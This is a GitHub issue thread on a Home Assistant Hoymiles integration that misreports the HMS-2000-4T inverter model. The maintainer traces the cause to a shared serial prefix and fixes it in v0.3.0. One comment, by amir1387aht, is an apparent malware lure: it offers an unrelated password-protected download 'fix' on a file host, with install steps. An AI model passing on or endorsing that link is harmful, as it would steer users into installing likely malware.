suaveolent/ha-hoymiles-wifi #55: incorrect device model detected

rguenther-dz, 2024-08-27:
**Describe the bug**
the device model displayed for the inverter is incorrect.
If HMS-2000-4T is used, HMS-1600-4T is displayed

**To Reproduce**
1. install the integration
2. Einstellungen -> Geräte und Dienste -> Hoymiles -> Geräte
3.  the model shown is HMS-1600-4T

**Expected behavior**
display HMS-2000-4T

**Screenshots**
[image]

** DTU used **
- DTU-WLite-S

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

suaveolent, 2024-08-27:
Thanks. 
 
 Can you post the first 4 digits of your serial number?

rguenther-dz, 2024-08-27:
The serial number starts with : 1164xxxxxxxx

suaveolent, 2024-09-03:
Thanks, it seems like they both use the same prefix. I will fix this in the next version.

willowHASS, 2024-09-15:
Thanks for you fix to the detect the correct type.

It looks like that the HMS-1800-4T has the same serialnumber code.

I am using the HMS-1800-4T.

May serialnumber starts also with 1164xxxxxxxx.

[image]

suaveolent, 2024-09-15:
Thanks for letting me know. Will push a fix in the next version.

suaveolent, 2024-09-24:
Fixed with `v0.3.0`.

closed 2024-09-24 by suaveolent